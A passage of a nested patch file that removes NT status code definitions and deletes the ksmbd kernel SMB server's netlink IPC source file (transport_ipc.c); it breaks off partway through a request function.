+-#define STATUS_GRAPHICS_INVALID_POINTER cpu_to_le32(0xC01E05E4)
+-#define STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE	\
+-	cpu_to_le32(0xC01E05E5)
+-#define STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E05E6)
+-#define STATUS_GRAPHICS_INTERNAL_ERROR cpu_to_le32(0xC01E05E7)
+-#define STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E05E8)
+-#define STATUS_FVE_LOCKED_VOLUME cpu_to_le32(0xC0210000)
+-#define STATUS_FVE_NOT_ENCRYPTED cpu_to_le32(0xC0210001)
+-#define STATUS_FVE_BAD_INFORMATION cpu_to_le32(0xC0210002)
+-#define STATUS_FVE_TOO_SMALL cpu_to_le32(0xC0210003)
+-#define STATUS_FVE_FAILED_WRONG_FS cpu_to_le32(0xC0210004)
+-#define STATUS_FVE_FAILED_BAD_FS cpu_to_le32(0xC0210005)
+-#define STATUS_FVE_FS_NOT_EXTENDED cpu_to_le32(0xC0210006)
+-#define STATUS_FVE_FS_MOUNTED cpu_to_le32(0xC0210007)
+-#define STATUS_FVE_NO_LICENSE cpu_to_le32(0xC0210008)
+-#define STATUS_FVE_ACTION_NOT_ALLOWED cpu_to_le32(0xC0210009)
+-#define STATUS_FVE_BAD_DATA cpu_to_le32(0xC021000A)
+-#define STATUS_FVE_VOLUME_NOT_BOUND cpu_to_le32(0xC021000B)
+-#define STATUS_FVE_NOT_DATA_VOLUME cpu_to_le32(0xC021000C)
+-#define STATUS_FVE_CONV_READ_ERROR cpu_to_le32(0xC021000D)
+-#define STATUS_FVE_CONV_WRITE_ERROR cpu_to_le32(0xC021000E)
+-#define STATUS_FVE_OVERLAPPED_UPDATE cpu_to_le32(0xC021000F)
+-#define STATUS_FVE_FAILED_SECTOR_SIZE cpu_to_le32(0xC0210010)
+-#define STATUS_FVE_FAILED_AUTHENTICATION cpu_to_le32(0xC0210011)
+-#define STATUS_FVE_NOT_OS_VOLUME cpu_to_le32(0xC0210012)
+-#define STATUS_FVE_KEYFILE_NOT_FOUND cpu_to_le32(0xC0210013)
+-#define STATUS_FVE_KEYFILE_INVALID cpu_to_le32(0xC0210014)
+-#define STATUS_FVE_KEYFILE_NO_VMK cpu_to_le32(0xC0210015)
+-#define STATUS_FVE_TPM_DISABLED cpu_to_le32(0xC0210016)
+-#define STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO cpu_to_le32(0xC0210017)
+-#define STATUS_FVE_TPM_INVALID_PCR cpu_to_le32(0xC0210018)
+-#define STATUS_FVE_TPM_NO_VMK cpu_to_le32(0xC0210019)
+-#define STATUS_FVE_PIN_INVALID cpu_to_le32(0xC021001A)
+-#define STATUS_FVE_AUTH_INVALID_APPLICATION cpu_to_le32(0xC021001B)
+-#define STATUS_FVE_AUTH_INVALID_CONFIG cpu_to_le32(0xC021001C)
+-#define STATUS_FVE_DEBUGGER_ENABLED cpu_to_le32(0xC021001D)
+-#define STATUS_FVE_DRY_RUN_FAILED cpu_to_le32(0xC021001E)
+-#define STATUS_FVE_BAD_METADATA_POINTER cpu_to_le32(0xC021001F)
+-#define STATUS_FVE_OLD_METADATA_COPY cpu_to_le32(0xC0210020)
+-#define STATUS_FVE_REBOOT_REQUIRED cpu_to_le32(0xC0210021)
+-#define STATUS_FVE_RAW_ACCESS cpu_to_le32(0xC0210022)
+-#define STATUS_FVE_RAW_BLOCKED cpu_to_le32(0xC0210023)
+-#define STATUS_FWP_CALLOUT_NOT_FOUND cpu_to_le32(0xC0220001)
+-#define STATUS_FWP_CONDITION_NOT_FOUND cpu_to_le32(0xC0220002)
+-#define STATUS_FWP_FILTER_NOT_FOUND cpu_to_le32(0xC0220003)
+-#define STATUS_FWP_LAYER_NOT_FOUND cpu_to_le32(0xC0220004)
+-#define STATUS_FWP_PROVIDER_NOT_FOUND cpu_to_le32(0xC0220005)
+-#define STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND cpu_to_le32(0xC0220006)
+-#define STATUS_FWP_SUBLAYER_NOT_FOUND cpu_to_le32(0xC0220007)
+-#define STATUS_FWP_NOT_FOUND cpu_to_le32(0xC0220008)
+-#define STATUS_FWP_ALREADY_EXISTS cpu_to_le32(0xC0220009)
+-#define STATUS_FWP_IN_USE cpu_to_le32(0xC022000A)
+-#define STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS cpu_to_le32(0xC022000B)
+-#define STATUS_FWP_WRONG_SESSION cpu_to_le32(0xC022000C)
+-#define STATUS_FWP_NO_TXN_IN_PROGRESS cpu_to_le32(0xC022000D)
+-#define STATUS_FWP_TXN_IN_PROGRESS cpu_to_le32(0xC022000E)
+-#define STATUS_FWP_TXN_ABORTED cpu_to_le32(0xC022000F)
+-#define STATUS_FWP_SESSION_ABORTED cpu_to_le32(0xC0220010)
+-#define STATUS_FWP_INCOMPATIBLE_TXN cpu_to_le32(0xC0220011)
+-#define STATUS_FWP_TIMEOUT cpu_to_le32(0xC0220012)
+-#define STATUS_FWP_NET_EVENTS_DISABLED cpu_to_le32(0xC0220013)
+-#define STATUS_FWP_INCOMPATIBLE_LAYER cpu_to_le32(0xC0220014)
+-#define STATUS_FWP_KM_CLIENTS_ONLY cpu_to_le32(0xC0220015)
+-#define STATUS_FWP_LIFETIME_MISMATCH cpu_to_le32(0xC0220016)
+-#define STATUS_FWP_BUILTIN_OBJECT cpu_to_le32(0xC0220017)
+-#define STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS cpu_to_le32(0xC0220018)
+-#define STATUS_FWP_TOO_MANY_CALLOUTS cpu_to_le32(0xC0220018)
+-#define STATUS_FWP_NOTIFICATION_DROPPED cpu_to_le32(0xC0220019)
+-#define STATUS_FWP_TRAFFIC_MISMATCH cpu_to_le32(0xC022001A)
+-#define STATUS_FWP_INCOMPATIBLE_SA_STATE cpu_to_le32(0xC022001B)
+-#define STATUS_FWP_NULL_POINTER cpu_to_le32(0xC022001C)
+-#define STATUS_FWP_INVALID_ENUMERATOR cpu_to_le32(0xC022001D)
+-#define STATUS_FWP_INVALID_FLAGS cpu_to_le32(0xC022001E)
+-#define STATUS_FWP_INVALID_NET_MASK cpu_to_le32(0xC022001F)
+-#define STATUS_FWP_INVALID_RANGE cpu_to_le32(0xC0220020)
+-#define STATUS_FWP_INVALID_INTERVAL cpu_to_le32(0xC0220021)
+-#define STATUS_FWP_ZERO_LENGTH_ARRAY cpu_to_le32(0xC0220022)
+-#define STATUS_FWP_NULL_DISPLAY_NAME cpu_to_le32(0xC0220023)
+-#define STATUS_FWP_INVALID_ACTION_TYPE cpu_to_le32(0xC0220024)
+-#define STATUS_FWP_INVALID_WEIGHT cpu_to_le32(0xC0220025)
+-#define STATUS_FWP_MATCH_TYPE_MISMATCH cpu_to_le32(0xC0220026)
+-#define STATUS_FWP_TYPE_MISMATCH cpu_to_le32(0xC0220027)
+-#define STATUS_FWP_OUT_OF_BOUNDS cpu_to_le32(0xC0220028)
+-#define STATUS_FWP_RESERVED cpu_to_le32(0xC0220029)
+-#define STATUS_FWP_DUPLICATE_CONDITION cpu_to_le32(0xC022002A)
+-#define STATUS_FWP_DUPLICATE_KEYMOD cpu_to_le32(0xC022002B)
+-#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002C)
+-#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER cpu_to_le32(0xC022002D)
+-#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002E)
+-#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT cpu_to_le32(0xC022002F)
+-#define STATUS_FWP_INCOMPATIBLE_AUTH_METHOD cpu_to_le32(0xC0220030)
+-#define STATUS_FWP_INCOMPATIBLE_DH_GROUP cpu_to_le32(0xC0220031)
+-#define STATUS_FWP_EM_NOT_SUPPORTED cpu_to_le32(0xC0220032)
+-#define STATUS_FWP_NEVER_MATCH cpu_to_le32(0xC0220033)
+-#define STATUS_FWP_PROVIDER_CONTEXT_MISMATCH cpu_to_le32(0xC0220034)
+-#define STATUS_FWP_INVALID_PARAMETER cpu_to_le32(0xC0220035)
+-#define STATUS_FWP_TOO_MANY_SUBLAYERS cpu_to_le32(0xC0220036)
+-#define STATUS_FWP_CALLOUT_NOTIFICATION_FAILED cpu_to_le32(0xC0220037)
+-#define STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG cpu_to_le32(0xC0220038)
+-#define STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG cpu_to_le32(0xC0220039)
+-#define STATUS_FWP_TCPIP_NOT_READY cpu_to_le32(0xC0220100)
+-#define STATUS_FWP_INJECT_HANDLE_CLOSING cpu_to_le32(0xC0220101)
+-#define STATUS_FWP_INJECT_HANDLE_STALE cpu_to_le32(0xC0220102)
+-#define STATUS_FWP_CANNOT_PEND cpu_to_le32(0xC0220103)
+-#define STATUS_NDIS_CLOSING cpu_to_le32(0xC0230002)
+-#define STATUS_NDIS_BAD_VERSION cpu_to_le32(0xC0230004)
+-#define STATUS_NDIS_BAD_CHARACTERISTICS cpu_to_le32(0xC0230005)
+-#define STATUS_NDIS_ADAPTER_NOT_FOUND cpu_to_le32(0xC0230006)
+-#define STATUS_NDIS_OPEN_FAILED cpu_to_le32(0xC0230007)
+-#define STATUS_NDIS_DEVICE_FAILED cpu_to_le32(0xC0230008)
+-#define STATUS_NDIS_MULTICAST_FULL cpu_to_le32(0xC0230009)
+-#define STATUS_NDIS_MULTICAST_EXISTS cpu_to_le32(0xC023000A)
+-#define STATUS_NDIS_MULTICAST_NOT_FOUND cpu_to_le32(0xC023000B)
+-#define STATUS_NDIS_REQUEST_ABORTED cpu_to_le32(0xC023000C)
+-#define STATUS_NDIS_RESET_IN_PROGRESS cpu_to_le32(0xC023000D)
+-#define STATUS_NDIS_INVALID_PACKET cpu_to_le32(0xC023000F)
+-#define STATUS_NDIS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0230010)
+-#define STATUS_NDIS_ADAPTER_NOT_READY cpu_to_le32(0xC0230011)
+-#define STATUS_NDIS_INVALID_LENGTH cpu_to_le32(0xC0230014)
+-#define STATUS_NDIS_INVALID_DATA cpu_to_le32(0xC0230015)
+-#define STATUS_NDIS_BUFFER_TOO_SHORT cpu_to_le32(0xC0230016)
+-#define STATUS_NDIS_INVALID_OID cpu_to_le32(0xC0230017)
+-#define STATUS_NDIS_ADAPTER_REMOVED cpu_to_le32(0xC0230018)
+-#define STATUS_NDIS_UNSUPPORTED_MEDIA cpu_to_le32(0xC0230019)
+-#define STATUS_NDIS_GROUP_ADDRESS_IN_USE cpu_to_le32(0xC023001A)
+-#define STATUS_NDIS_FILE_NOT_FOUND cpu_to_le32(0xC023001B)
+-#define STATUS_NDIS_ERROR_READING_FILE cpu_to_le32(0xC023001C)
+-#define STATUS_NDIS_ALREADY_MAPPED cpu_to_le32(0xC023001D)
+-#define STATUS_NDIS_RESOURCE_CONFLICT cpu_to_le32(0xC023001E)
+-#define STATUS_NDIS_MEDIA_DISCONNECTED cpu_to_le32(0xC023001F)
+-#define STATUS_NDIS_INVALID_ADDRESS cpu_to_le32(0xC0230022)
+-#define STATUS_NDIS_PAUSED cpu_to_le32(0xC023002A)
+-#define STATUS_NDIS_INTERFACE_NOT_FOUND cpu_to_le32(0xC023002B)
+-#define STATUS_NDIS_UNSUPPORTED_REVISION cpu_to_le32(0xC023002C)
+-#define STATUS_NDIS_INVALID_PORT cpu_to_le32(0xC023002D)
+-#define STATUS_NDIS_INVALID_PORT_STATE cpu_to_le32(0xC023002E)
+-#define STATUS_NDIS_LOW_POWER_STATE cpu_to_le32(0xC023002F)
+-#define STATUS_NDIS_NOT_SUPPORTED cpu_to_le32(0xC02300BB)
+-#define STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED cpu_to_le32(0xC0232000)
+-#define STATUS_NDIS_DOT11_MEDIA_IN_USE cpu_to_le32(0xC0232001)
+-#define STATUS_NDIS_DOT11_POWER_STATE_INVALID cpu_to_le32(0xC0232002)
+-#define STATUS_IPSEC_BAD_SPI cpu_to_le32(0xC0360001)
+-#define STATUS_IPSEC_SA_LIFETIME_EXPIRED cpu_to_le32(0xC0360002)
+-#define STATUS_IPSEC_WRONG_SA cpu_to_le32(0xC0360003)
+-#define STATUS_IPSEC_REPLAY_CHECK_FAILED cpu_to_le32(0xC0360004)
+-#define STATUS_IPSEC_INVALID_PACKET cpu_to_le32(0xC0360005)
+-#define STATUS_IPSEC_INTEGRITY_CHECK_FAILED cpu_to_le32(0xC0360006)
+-#define STATUS_IPSEC_CLEAR_TEXT_DROP cpu_to_le32(0xC0360007)
+-
+-#define STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP cpu_to_le32(0xC05D0000)
+-#define STATUS_INVALID_LOCK_RANGE cpu_to_le32(0xC00001a1)
+diff --git a/fs/ksmbd/transport_ipc.c b/fs/ksmbd/transport_ipc.c
+deleted file mode 100644
+index 40c721f9227e4..0000000000000
+--- a/fs/ksmbd/transport_ipc.c
++++ /dev/null
+@@ -1,884 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/jhash.h>
+-#include <linux/slab.h>
+-#include <linux/rwsem.h>
+-#include <linux/mutex.h>
+-#include <linux/wait.h>
+-#include <linux/hashtable.h>
+-#include <net/net_namespace.h>
+-#include <net/genetlink.h>
+-#include <linux/socket.h>
+-#include <linux/workqueue.h>
+-
+-#include "vfs_cache.h"
+-#include "transport_ipc.h"
+-#include "server.h"
+-#include "smb_common.h"
+-
+-#include "mgmt/user_config.h"
+-#include "mgmt/share_config.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/tree_connect.h"
+-#include "mgmt/ksmbd_ida.h"
+-#include "connection.h"
+-#include "transport_tcp.h"
+-#include "transport_rdma.h"
+-
+-#define IPC_WAIT_TIMEOUT	(2 * HZ)
+-
+-#define IPC_MSG_HASH_BITS	3
+-static DEFINE_HASHTABLE(ipc_msg_table, IPC_MSG_HASH_BITS);
+-static DECLARE_RWSEM(ipc_msg_table_lock);
+-static DEFINE_MUTEX(startup_lock);
+-
+-static DEFINE_IDA(ipc_ida);
+-
+-static unsigned int ksmbd_tools_pid;
+-
+-static bool ksmbd_ipc_validate_version(struct genl_info *m)
+-{
+-	if (m->genlhdr->version != KSMBD_GENL_VERSION) {
+-		pr_err("%s. ksmbd: %d, kernel module: %d. %s.\n",
+-		       "Daemon and kernel module version mismatch",
+-		       m->genlhdr->version,
+-		       KSMBD_GENL_VERSION,
+-		       "User-space ksmbd should terminate");
+-		return false;
+-	}
+-	return true;
+-}
+-
+-struct ksmbd_ipc_msg {
+-	unsigned int		type;
+-	unsigned int		sz;
+-	unsigned char		payload[];
+-};
+-
+-struct ipc_msg_table_entry {
+-	unsigned int		handle;
+-	unsigned int		type;
+-	wait_queue_head_t	wait;
+-	struct hlist_node	ipc_table_hlist;
+-
+-	void			*response;
+-};
+-
+-static struct delayed_work ipc_timer_work;
+-
+-static int handle_startup_event(struct sk_buff *skb, struct genl_info *info);
+-static int handle_unsupported_event(struct sk_buff *skb, struct genl_info *info);
+-static int handle_generic_event(struct sk_buff *skb, struct genl_info *info);
+-static int ksmbd_ipc_heartbeat_request(void);
+-
+-static const struct nla_policy ksmbd_nl_policy[KSMBD_EVENT_MAX] = {
+-	[KSMBD_EVENT_UNSPEC] = {
+-		.len = 0,
+-	},
+-	[KSMBD_EVENT_HEARTBEAT_REQUEST] = {
+-		.len = sizeof(struct ksmbd_heartbeat),
+-	},
+-	[KSMBD_EVENT_STARTING_UP] = {
+-		.len = sizeof(struct ksmbd_startup_request),
+-	},
+-	[KSMBD_EVENT_SHUTTING_DOWN] = {
+-		.len = sizeof(struct ksmbd_shutdown_request),
+-	},
+-	[KSMBD_EVENT_LOGIN_REQUEST] = {
+-		.len = sizeof(struct ksmbd_login_request),
+-	},
+-	[KSMBD_EVENT_LOGIN_RESPONSE] = {
+-		.len = sizeof(struct ksmbd_login_response),
+-	},
+-	[KSMBD_EVENT_SHARE_CONFIG_REQUEST] = {
+-		.len = sizeof(struct ksmbd_share_config_request),
+-	},
+-	[KSMBD_EVENT_SHARE_CONFIG_RESPONSE] = {
+-		.len = sizeof(struct ksmbd_share_config_response),
+-	},
+-	[KSMBD_EVENT_TREE_CONNECT_REQUEST] = {
+-		.len = sizeof(struct ksmbd_tree_connect_request),
+-	},
+-	[KSMBD_EVENT_TREE_CONNECT_RESPONSE] = {
+-		.len = sizeof(struct ksmbd_tree_connect_response),
+-	},
+-	[KSMBD_EVENT_TREE_DISCONNECT_REQUEST] = {
+-		.len = sizeof(struct ksmbd_tree_disconnect_request),
+-	},
+-	[KSMBD_EVENT_LOGOUT_REQUEST] = {
+-		.len = sizeof(struct ksmbd_logout_request),
+-	},
+-	[KSMBD_EVENT_RPC_REQUEST] = {
+-	},
+-	[KSMBD_EVENT_RPC_RESPONSE] = {
+-	},
+-	[KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST] = {
+-	},
+-	[KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE] = {
+-	},
+-};
+-
+-static struct genl_ops ksmbd_genl_ops[] = {
+-	{
+-		.cmd	= KSMBD_EVENT_UNSPEC,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_HEARTBEAT_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_STARTING_UP,
+-		.doit	= handle_startup_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_SHUTTING_DOWN,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_LOGIN_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_LOGIN_RESPONSE,
+-		.doit	= handle_generic_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_SHARE_CONFIG_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_SHARE_CONFIG_RESPONSE,
+-		.doit	= handle_generic_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_TREE_CONNECT_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_TREE_CONNECT_RESPONSE,
+-		.doit	= handle_generic_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_TREE_DISCONNECT_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_LOGOUT_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_RPC_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_RPC_RESPONSE,
+-		.doit	= handle_generic_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST,
+-		.doit	= handle_unsupported_event,
+-	},
+-	{
+-		.cmd	= KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE,
+-		.doit	= handle_generic_event,
+-	},
+-};
+-
+-static struct genl_family ksmbd_genl_family = {
+-	.name		= KSMBD_GENL_NAME,
+-	.version	= KSMBD_GENL_VERSION,
+-	.hdrsize	= 0,
+-	.maxattr	= KSMBD_EVENT_MAX,
+-	.netnsok	= true,
+-	.module		= THIS_MODULE,
+-	.ops		= ksmbd_genl_ops,
+-	.n_ops		= ARRAY_SIZE(ksmbd_genl_ops),
+-	.resv_start_op	= KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE + 1,
+-};
+-
+-static void ksmbd_nl_init_fixup(void)
+-{
+-	int i;
+-
+-	for (i = 0; i < ARRAY_SIZE(ksmbd_genl_ops); i++)
+-		ksmbd_genl_ops[i].validate = GENL_DONT_VALIDATE_STRICT |
+-						GENL_DONT_VALIDATE_DUMP;
+-
+-	ksmbd_genl_family.policy = ksmbd_nl_policy;
+-}
+-
+-static int rpc_context_flags(struct ksmbd_session *sess)
+-{
+-	if (user_guest(sess->user))
+-		return KSMBD_RPC_RESTRICTED_CONTEXT;
+-	return 0;
+-}
+-
+-static void ipc_update_last_active(void)
+-{
+-	if (server_conf.ipc_timeout)
+-		server_conf.ipc_last_active = jiffies;
+-}
+-
+-static struct ksmbd_ipc_msg *ipc_msg_alloc(size_t sz)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	size_t msg_sz = sz + sizeof(struct ksmbd_ipc_msg);
+-
+-	msg = kvmalloc(msg_sz, GFP_KERNEL | __GFP_ZERO);
+-	if (msg)
+-		msg->sz = sz;
+-	return msg;
+-}
+-
+-static void ipc_msg_free(struct ksmbd_ipc_msg *msg)
+-{
+-	kvfree(msg);
+-}
+-
+-static void ipc_msg_handle_free(int handle)
+-{
+-	if (handle >= 0)
+-		ksmbd_release_id(&ipc_ida, handle);
+-}
+-
+-static int handle_response(int type, void *payload, size_t sz)
+-{
+-	unsigned int handle = *(unsigned int *)payload;
+-	struct ipc_msg_table_entry *entry;
+-	int ret = 0;
+-
+-	ipc_update_last_active();
+-	down_read(&ipc_msg_table_lock);
+-	hash_for_each_possible(ipc_msg_table, entry, ipc_table_hlist, handle) {
+-		if (handle != entry->handle)
+-			continue;
+-
+-		entry->response = NULL;
+-		/*
+-		 * Response message type value should be equal to
+-		 * request message type + 1.
+-		 */
+-		if (entry->type + 1 != type) {
+-			pr_err("Waiting for IPC type %d, got %d. Ignore.\n",
+-			       entry->type + 1, type);
+-		}
+-
+-		entry->response = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
+-		if (!entry->response) {
+-			ret = -ENOMEM;
+-			break;
+-		}
+-
+-		memcpy(entry->response, payload, sz);
+-		wake_up_interruptible(&entry->wait);
+-		ret = 0;
+-		break;
+-	}
+-	up_read(&ipc_msg_table_lock);
+-
+-	return ret;
+-}
+-
+-static int ipc_server_config_on_startup(struct ksmbd_startup_request *req)
+-{
+-	int ret;
+-
+-	ksmbd_set_fd_limit(req->file_max);
+-	server_conf.flags = req->flags;
+-	server_conf.signing = req->signing;
+-	server_conf.tcp_port = req->tcp_port;
+-	server_conf.ipc_timeout = req->ipc_timeout * HZ;
+-	server_conf.deadtime = req->deadtime * SMB_ECHO_INTERVAL;
+-	server_conf.share_fake_fscaps = req->share_fake_fscaps;
+-	ksmbd_init_domain(req->sub_auth);
+-
+-	if (req->smb2_max_read)
+-		init_smb2_max_read_size(req->smb2_max_read);
+-	if (req->smb2_max_write)
+-		init_smb2_max_write_size(req->smb2_max_write);
+-	if (req->smb2_max_trans)
+-		init_smb2_max_trans_size(req->smb2_max_trans);
+-	if (req->smb2_max_credits)
+-		init_smb2_max_credits(req->smb2_max_credits);
+-	if (req->smbd_max_io_size)
+-		init_smbd_max_io_size(req->smbd_max_io_size);
+-
+-	if (req->max_connections)
+-		server_conf.max_connections = req->max_connections;
+-
+-	ret = ksmbd_set_netbios_name(req->netbios_name);
+-	ret |= ksmbd_set_server_string(req->server_string);
+-	ret |= ksmbd_set_work_group(req->work_group);
+-	ret |= ksmbd_tcp_set_interfaces(KSMBD_STARTUP_CONFIG_INTERFACES(req),
+-					req->ifc_list_sz);
+-	if (ret) {
+-		pr_err("Server configuration error: %s %s %s\n",
+-		       req->netbios_name, req->server_string,
+-		       req->work_group);
+-		return ret;
+-	}
+-
+-	if (req->min_prot[0]) {
+-		ret = ksmbd_lookup_protocol_idx(req->min_prot);
+-		if (ret >= 0)
+-			server_conf.min_protocol = ret;
+-	}
+-	if (req->max_prot[0]) {
+-		ret = ksmbd_lookup_protocol_idx(req->max_prot);
+-		if (ret >= 0)
+-			server_conf.max_protocol = ret;
+-	}
+-
+-	if (server_conf.ipc_timeout)
+-		schedule_delayed_work(&ipc_timer_work, server_conf.ipc_timeout);
+-	return 0;
+-}
+-
+-static int handle_startup_event(struct sk_buff *skb, struct genl_info *info)
+-{
+-	int ret = 0;
+-
+-#ifdef CONFIG_SMB_SERVER_CHECK_CAP_NET_ADMIN
+-	if (!netlink_capable(skb, CAP_NET_ADMIN))
+-		return -EPERM;
+-#endif
+-
+-	if (!ksmbd_ipc_validate_version(info))
+-		return -EINVAL;
+-
+-	if (!info->attrs[KSMBD_EVENT_STARTING_UP])
+-		return -EINVAL;
+-
+-	mutex_lock(&startup_lock);
+-	if (!ksmbd_server_configurable()) {
+-		mutex_unlock(&startup_lock);
+-		pr_err("Server reset is in progress, can't start daemon\n");
+-		return -EINVAL;
+-	}
+-
+-	if (ksmbd_tools_pid) {
+-		if (ksmbd_ipc_heartbeat_request() == 0) {
+-			ret = -EINVAL;
+-			goto out;
+-		}
+-
+-		pr_err("Reconnect to a new user space daemon\n");
+-	} else {
+-		struct ksmbd_startup_request *req;
+-
+-		req = nla_data(info->attrs[info->genlhdr->cmd]);
+-		ret = ipc_server_config_on_startup(req);
+-		if (ret)
+-			goto out;
+-		server_queue_ctrl_init_work();
+-	}
+-
+-	ksmbd_tools_pid = info->snd_portid;
+-	ipc_update_last_active();
+-
+-out:
+-	mutex_unlock(&startup_lock);
+-	return ret;
+-}
+-
+-static int handle_unsupported_event(struct sk_buff *skb, struct genl_info *info)
+-{
+-	pr_err("Unknown IPC event: %d, ignore.\n", info->genlhdr->cmd);
+-	return -EINVAL;
+-}
+-
+-static int handle_generic_event(struct sk_buff *skb, struct genl_info *info)
+-{
+-	void *payload;
+-	int sz;
+-	int type = info->genlhdr->cmd;
+-
+-#ifdef CONFIG_SMB_SERVER_CHECK_CAP_NET_ADMIN
+-	if (!netlink_capable(skb, CAP_NET_ADMIN))
+-		return -EPERM;
+-#endif
+-
+-	if (type >= KSMBD_EVENT_MAX) {
+-		WARN_ON(1);
+-		return -EINVAL;
+-	}
+-
+-	if (!ksmbd_ipc_validate_version(info))
+-		return -EINVAL;
+-
+-	if (!info->attrs[type])
+-		return -EINVAL;
+-
+-	payload = nla_data(info->attrs[info->genlhdr->cmd]);
+-	sz = nla_len(info->attrs[info->genlhdr->cmd]);
+-	return handle_response(type, payload, sz);
+-}
+-
+-static int ipc_msg_send(struct ksmbd_ipc_msg *msg)
+-{
+-	struct genlmsghdr *nlh;
+-	struct sk_buff *skb;
+-	int ret = -EINVAL;
+-
+-	if (!ksmbd_tools_pid)
+-		return ret;
+-
+-	skb = genlmsg_new(msg->sz, GFP_KERNEL);
+-	if (!skb)
+-		return -ENOMEM;
+-
+-	nlh = genlmsg_put(skb, 0, 0, &ksmbd_genl_family, 0, msg->type);
+-	if (!nlh)
+-		goto out;
+-
+-	ret = nla_put(skb, msg->type, msg->sz, msg->payload);
+-	if (ret) {
+-		genlmsg_cancel(skb, nlh);
+-		goto out;
+-	}
+-
+-	genlmsg_end(skb, nlh);
+-	ret = genlmsg_unicast(&init_net, skb, ksmbd_tools_pid);
+-	if (!ret)
+-		ipc_update_last_active();
+-	return ret;
+-
+-out:
+-	nlmsg_free(skb);
+-	return ret;
+-}
+-
+-static void *ipc_msg_send_request(struct ksmbd_ipc_msg *msg, unsigned int handle)
+-{
+-	struct ipc_msg_table_entry entry;
+-	int ret;
+-
+-	if ((int)handle < 0)
+-		return NULL;
+-
+-	entry.type = msg->type;
+-	entry.response = NULL;
+-	init_waitqueue_head(&entry.wait);
+-
+-	down_write(&ipc_msg_table_lock);
+-	entry.handle = handle;
+-	hash_add(ipc_msg_table, &entry.ipc_table_hlist, entry.handle);
+-	up_write(&ipc_msg_table_lock);
+-
+-	ret = ipc_msg_send(msg);
+-	if (ret)
+-		goto out;
+-
+-	ret = wait_event_interruptible_timeout(entry.wait,
+-					       entry.response != NULL,
+-					       IPC_WAIT_TIMEOUT);
+-out:
+-	down_write(&ipc_msg_table_lock);
+-	hash_del(&entry.ipc_table_hlist);
+-	up_write(&ipc_msg_table_lock);
+-	return entry.response;
+-}
+-
+-static int ksmbd_ipc_heartbeat_request(void)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	int ret;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_heartbeat));
+-	if (!msg)
+-		return -EINVAL;
+-
+-	msg->type = KSMBD_EVENT_HEARTBEAT_REQUEST;
+-	ret = ipc_msg_send(msg);
+-	ipc_msg_free(msg);
+-	return ret;
+-}
+-
+-struct ksmbd_login_response *ksmbd_ipc_login_request(const char *account)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_login_request *req;
+-	struct ksmbd_login_response *resp;
+-
+-	if (strlen(account) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
+-		return NULL;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_login_request));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_LOGIN_REQUEST;
+-	req = (struct ksmbd_login_request *)msg->payload;
+-	req->handle = ksmbd_acquire_id(&ipc_ida);
+-	strscpy(req->account, account, KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_handle_free(req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_spnego_authen_response *
+-ksmbd_ipc_spnego_authen_request(const char *spnego_blob, int blob_len)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_spnego_authen_request *req;
+-	struct ksmbd_spnego_authen_response *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_spnego_authen_request) +
